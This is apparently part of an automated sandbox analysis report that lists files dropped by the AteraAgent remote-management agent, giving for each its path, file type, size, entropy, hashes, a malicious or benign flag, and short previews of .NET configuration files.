                                                                                                                                                                                                                                                                                                                                  SHA-512:C71C1AC1F8C3EA5E2F3DCC64BB5FFB58FB813CD379DC6E78F23FBDC263C12D0B8213357D06880E3C78A8AB9BF47740B15E3D1004FE9BBD75054D8FB89DB44E4A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):386600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.136023666712228
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:+sETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEyc:+sbZnMfwWFKFrrWa8BvEyc
                                                                                                                                                                                                                                                                                                                                  MD5:3E62665090D7F85697152BC60771F336
                                                                                                                                                                                                                                                                                                                                  SHA1:FB1748721EC8D2A5CBBA735F0083996CAD2C8F04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A7B6C8F8F8E6AAC658D8ECBF08CB16F7FA1570EF66E75D720B4E3C162B7DC801
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F15AF521E1B8362DB6BD380A0D7DE9F94016AFCCAE27CA1218E8F35567B2CD86F93DB2ADCA0D341D5D5485D5E56717665CC6D0C1484DA5DE76DF9098A64B17A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.837429951454658
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mN9VWhX3WseNyb8E9VF6IYijSJIVxF5WvBgsS:GGZmEpYi605
                                                                                                                                                                                                                                                                                                                                  MD5:64A100F5FBD1BA75FEC06C54363454DE
                                                                                                                                                                                                                                                                                                                                  SHA1:1DD0705AAC84F2E337D9AD06F7415FCAD3D35A73
                                                                                                                                                                                                                                                                                                                                  SHA-256:59A828941D113EFEA0BABC547A5DD7C5990F584CEC46FBAC5400CA4F7203198F
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFA50804F3BC1E40C846A423AC645A6D069AF38D93A7C20C85BD96A6E9840F7FE6F3E3856889C6024882266B6141C02C39331EF65C1946A407A0061933F943C5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):331816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.168297341567773
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9BhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTk:9DMUWITZznu85k8Wdn8KmCjIFi3VvQ
                                                                                                                                                                                                                                                                                                                                  MD5:CC1B01C536A4444A614E31B9F9CEDA70
                                                                                                                                                                                                                                                                                                                                  SHA1:3FF92B3934EC29D69AC6CF264290056CEC6E11FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B5D6FD27B69F121F8BF2CAAF42F57716A18396178127531558AD5B683C6C44D
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7AFB3FECC728E1068E2E3D57087E8BB8F0B4E17C987104011C0E5D6E3F9DAAE94C70414E13FF0BEECCB6AF4A0A0C23421E018756E49EAC7896A3B60EFB31000
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071391259136351
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:R1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQi:R1n1p9LdRN39aQZUqD
                                                                                                                                                                                                                                                                                                                                  MD5:97BDC98E91F0F3E959C0084420787627
                                                                                                                                                                                                                                                                                                                                  SHA1:D1E26C35D355B7F12770F10AA43B33291CCA45DC
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8F2A4C3198D5ACBB27FBA2AD4DE17D7A00ED7FEA636E7391061AA65ED33FA8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:39E021D6E7711ABA2BE2799C760D27A398FFEC5E3CDF4E3AF7BE3BF1AD0EFB1CFD5438E891D3A452D072E250CF9AF1EF64A162E66A411D8027BB336D8AC28D47
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960319767444213
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:CBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU2:CBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:276F4390B80A675709803A82BB233C96
                                                                                                                                                                                                                                                                                                                                  SHA1:091B491E832C2CE791C3EA9AC6300B2BE04286AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:02DD902A4C7F18BB1660B0CCB0B6B108029E71819DD69437C6611EDABA534C23
                                                                                                                                                                                                                                                                                                                                  SHA-512:858444A45D94A0603F72886254BFDACB97B91A86AB41BA869FF51FAA9BD33BBF9C5E9E094945A1D40BE0AA57CF34E2A22336B216A1D3691BCC82F1A3762CDD81
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.184377527387507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:yZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zvF:yZU0BJwuOcrl1w7HX3HWo
                                                                                                                                                                                                                                                                                                                                  MD5:8709E96843FA29CCC7E53D044023C552
                                                                                                                                                                                                                                                                                                                                  SHA1:B08DDF9C187F1B059C2AE92A4566FD9F29995A23
                                                                                                                                                                                                                                                                                                                                  SHA-256:CCC0F9C6AC1EB828C9CE8BA6DE85883F62BC77F314BDB051F941FA4C557EB9F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:EC4D1DE0860DB304552F4698F1910A749D59C11478FF97C96B25F735370EA35CE65FC3AC3EEDAF180797199CA6EF0D689038A7941461BD3B63B41BBD1BE27551
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.559799059321212
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:UAQk7qYbA6fXDpLk5LHAxOEaGxBtNXNyb8E9VF6IYijSJIVxsuAA:f1LOg3BtNbEpYi60r
                                                                                                                                                                                                                                                                                                                                  MD5:2BAAFD549134B93D6AEAB6C76C7F09F7
                                                                                                                                                                                                                                                                                                                                  SHA1:D9248BEB04AFB5636FA53DCDEF7D2B4E7D31BC83
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4AEADB114BACA3E90BE9A8A6E3F856F603CEC41330EC8E77F3BF83980072CC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D6463F497CA32BF3317072AD528376D4C7E3D99330611BCE447FF93967EA39F66762AB4585C9C8A220726FBC1BC1329999AD8B2A7C402107F1D47CC64478C02
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2029
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                                                                                                                  MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                                                                                                                  SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                                                                                                                  SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                                                                                                                  SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):210984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348074820428543
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:esMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z54a7i:jMNkrE4AOqcIzQijL8
                                                                                                                                                                                                                                                                                                                                  MD5:FF36CEEC4BE917103DB73BC605896B9F
                                                                                                                                                                                                                                                                                                                                  SHA1:DD994E78F385971C64051CC3F5B2542D5B1789B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:FD8BD1FAF055618546632F7B923B58742139125E52CD6C01AED5297A89044BFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:430E17B0C68AEDDEEF1192A5814FD248B7D649261A671210197D0564981FDD3C1ADD1FF711E1CDFE5E863FBB636C69829A89F05BD8F5B52E9FC8ADD30AB5644A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19433
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                                                                                                                  MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                                                                                                                  SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                                                                                                                  SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284200
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117049966728456
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:WZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHe:kgo0WPVTXg+
                                                                                                                                                                                                                                                                                                                                  MD5:0C6AD6E963A164F2E51BB61430C60DFB
                                                                                                                                                                                                                                                                                                                                  SHA1:43628C0A6A2BF87EDD57FB524EFB1DF7D0189E17
                                                                                                                                                                                                                                                                                                                                  SHA-256:D99BDAA6F59A3B7979DBEB7A55F21B92A8C5DE3B0ABB4F116942BEC2D5A61537
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFC0BC29E0061840E00FFA5E67FC98086A134516F6D1FB725AA1961A00EDBA571EA86E16ED8A0B6914F6B2504395EF35AA652490FC01E331A87B9BB7818E9B42
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.804250883647438
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:9DNxWQFWsoNyb8E9VF6IYijSJIVx5+cQJ:9DNVLAEpYi606J
                                                                                                                                                                                                                                                                                                                                  MD5:74F878419C11382888EFA50687C90834
                                                                                                                                                                                                                                                                                                                                  SHA1:9C97E0D54D4FCE82736AD950120C52A4CF380EFF
                                                                                                                                                                                                                                                                                                                                  SHA-256:F3182C56ADD5B703FB58A4253544A9EC97F40256F004A827185BDED5EE94F1BA
                                                                                                                                                                                                                                                                                                                                  SHA-512:729514467096AE0A2F6555A1F51B982952082B91C3C66097028D9646EA57AEDBE69EB499C80EFBBBE8493F15C8115DF7AAB1EE81B9AEC356E946585F3986BC0F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.672115220904619
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:SrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAIc:SrMcXP64LEpYi60w
                                                                                                                                                                                                                                                                                                                                  MD5:941B45F33F855408E176B2EA151C7EFC
                                                                                                                                                                                                                                                                                                                                  SHA1:BDD9621293804B660216264FFAE908B3EF9C60F9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD13545CC86B37E825EFB6440DB73335FD40E6FAAEE6DE9CF6DB9361CC0F1A2F
                                                                                                                                                                                                                                                                                                                                  SHA-512:45AF4489089D7D534754B37402ED5CB174C123BB8E4CE327BBC7AC63D8A1266E957272B1B083F632ED2A85A8F643B51058B1375CB242FFE815C88D1B66B9FEDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.903448570149305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Hm2igOWnW8rW/tNyb8E9VF6IYijSJIVxPT89bt2:ftaJEpYi60w9o
                                                                                                                                                                                                                                                                                                                                  MD5:FA4026B55B56CE7FF0F0B4EE39C7BE1F
                                                                                                                                                                                                                                                                                                                                  SHA1:1425FAC6AC722AEEFDC5F487ACA5EA2949C84AC9
                                                                                                                                                                                                                                                                                                                                  SHA-256:3ADDF4C2DEFEF30D4CDAD56F0BBAD7349DE2337B2423391DFFBF98C25171590D
                                                                                                                                                                                                                                                                                                                                  SHA-512:8EB99731FD4E22772A31B45D77B3B0551A7D3E3382C85C0135B0391D27ACE7878EB394F24A506F3EB8DD76136828AD2C06717F0FF8E05ED74B046F352DF25EBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.897847752967933
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Xnapn1iwwPWcGWT5JNyb8E9VF6IYijSJIVxagmKIFod:KDur5NEpYi600T6d
                                                                                                                                                                                                                                                                                                                                  MD5:B5BEC9ED7D73E851EFFC53D539746ACB
                                                                                                                                                                                                                                                                                                                                  SHA1:8B69C95BFFC7545C08FD7176DBE7AB1505F9C2B8
                                                                                                                                                                                                                                                                                                                                  SHA-256:AE4AA1BF402777EE6217A7D599F085934A229CFDDB499F6227FC7F26105C1103
                                                                                                                                                                                                                                                                                                                                  SHA-512:93005D7AA725D9BF1D27E03E16DAD513DC762FBABF21125E71FCBB3881CD473EB18769FE2F96F8D44919DC5816A47B06CB8CCAA85AF11A3B37736AEC72830470
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.904190588942639
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mHLaEav5aaUa6arWVLWrMNyb8E9VF6IYijSJIVxg3z0:vPv5t/NOOMEpYi608o
                                                                                                                                                                                                                                                                                                                                  MD5:408F174F723F7B60C4600119D934BBC1
                                                                                                                                                                                                                                                                                                                                  SHA1:F0A9A40533391007B79DDB6766E7596C69D41C53
                                                                                                                                                                                                                                                                                                                                  SHA-256:2E7673528241C399D806009BEC9EB00854C0648F2074849CE1310F9FB42BEACF
                                                                                                                                                                                                                                                                                                                                  SHA-512:90C1E915D3AFCAEC7A178DE6790A0C7802B425F5CDB010924F35F24C07113B8FBC4881B4B70D6CE0ACC9F2BF071EF8349C6031393FC9ADEE4F77BFF1E479873A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.759198735233295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:96iIJq56dOuWSKeWukNyb8E9VF6IYijSJIVxHDRxQl57:DiAuEEpYi609mr
                                                                                                                                                                                                                                                                                                                                  MD5:9CA6C1AED2900254A8C151D7EEBE4628
                                                                                                                                                                                                                                                                                                                                  SHA1:FEEF5F2FF4F88276CE21F87E20CC775F01172C25
                                                                                                                                                                                                                                                                                                                                  SHA-256:80382824DA65BD224843E5FF5F5054BD2E58AC024AA3745DA71A4D82929353D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:3ECA468ADE2C324E26BA38BD07DFCD6354D11AE280D9EF7F2E473F09BA81A9E79CA17DFF37355625284902EB43258AF6C0C5CF003213F041A4CE3EE0EAF6E7D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.81047849375507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Znzz+MpSaLWW0+WCANyb8E9VF6IYijSJIVx1JZ3:9pui4EpYi607t
                                                                                                                                                                                                                                                                                                                                  MD5:479445CAA7422BD82A5119B13EB1C87E
                                                                                                                                                                                                                                                                                                                                  SHA1:F1AB35C284589C4B137D44CFC7F342E616EC412C
                                                                                                                                                                                                                                                                                                                                  SHA-256:54A3C0CA57D404AD4E1FA44A704B3E7716AB135722FE75D555618C4CEB4743F6
                                                                                                                                                                                                                                                                                                                                  SHA-512:557A47072BFC697E96A6376E14301117789ACF8683FAAAF3A7F24A5DA28C6CC283E48EDE3AD41FE0FC1EBD2491C4C70E7D42821E656C33F43E50E0E390EA1121
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.859061233677978
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:PGhr+YUfyHxsW/HW5zNyb8E9VF6IYijSJIVxVUx9X:ckmcvEpYi606X
                                                                                                                                                                                                                                                                                                                                  MD5:9F56AE0FB6B201BAA11308CF285C95C3
                                                                                                                                                                                                                                                                                                                                  SHA1:9F189766A2011E8A99A830D79F68BD620B9C939B
                                                                                                                                                                                                                                                                                                                                  SHA-256:B36B189333DC3CDCBF3ED807077BD95E1B11FF64D9E11C9A0450D38243F9E73B
                                                                                                                                                                                                                                                                                                                                  SHA-512:44B530811CFB382703A52F8C95FFC327D34DB17E236FFE4BA6462E76383B9C55A054798CF48346204AAD2E840E456E699ED357E945C26B16A4CCD4F8934FE832
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.788577351501408
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:IRE+ruiA5vzWeNWdSNyb8E9VF6IYijSJIVx4Xqeagk/:IS9b2yEpYi60YmZ
                                                                                                                                                                                                                                                                                                                                  MD5:0CE8AB464B6861F26CA3CE02DB21BEF8
                                                                                                                                                                                                                                                                                                                                  SHA1:92B748856CB37B14A6473FD15B5AC214CD3B758A
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF8757D694278711237B600E6C15B0C041E23CA8F1D032149AF78CC8E10B8EED
